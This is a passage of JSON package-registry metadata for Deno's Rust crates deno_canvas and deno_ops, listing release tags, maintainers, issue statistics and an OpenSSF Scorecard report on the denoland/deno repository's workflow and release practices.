1:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-22T16:41:47.089Z","dependent_packages_count":1,"downloads":249684,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":96.4863011226221,"dependent_repos_count":29.752794062436827,"dependent_packages_count":35.03624339388339,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":53.75844619298076},"purl":"pkg:cargo/deno_canvas","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_canvas","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_canvas","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_canvas/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_canvas/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_canvas/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_canvas/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_canvas/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_canvas/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_canvas/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2024-01-25T03:30:29.347Z","updated_at":"2024-01-25T03:30:29.347Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2024-01-26T06:11:59.433Z","updated_at":"2024-01-26T06:11:59.433Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":4047461,"name":"deno_ops","ecosystem":"cargo","description":"Proc macro for writing Deno Ops","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":289,"first_release_published_at":"2022-03-14T17:10:13.243Z","latest_release_published_at":"2026-08-27T15:19:38.870Z","latest_release_number":"0.287.0","last_synced_at":"2026-08-29T21:56:50.265Z","created_at":"2022-04-12T10:01:01.584Z","updated_at":"2026-08-29T21:56:50.265Z","registry_url":"https://crates.io/crates/deno_ops/","install_command":"cargo install deno_ops","documentation_url":"https://docs.rs/deno_ops/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: 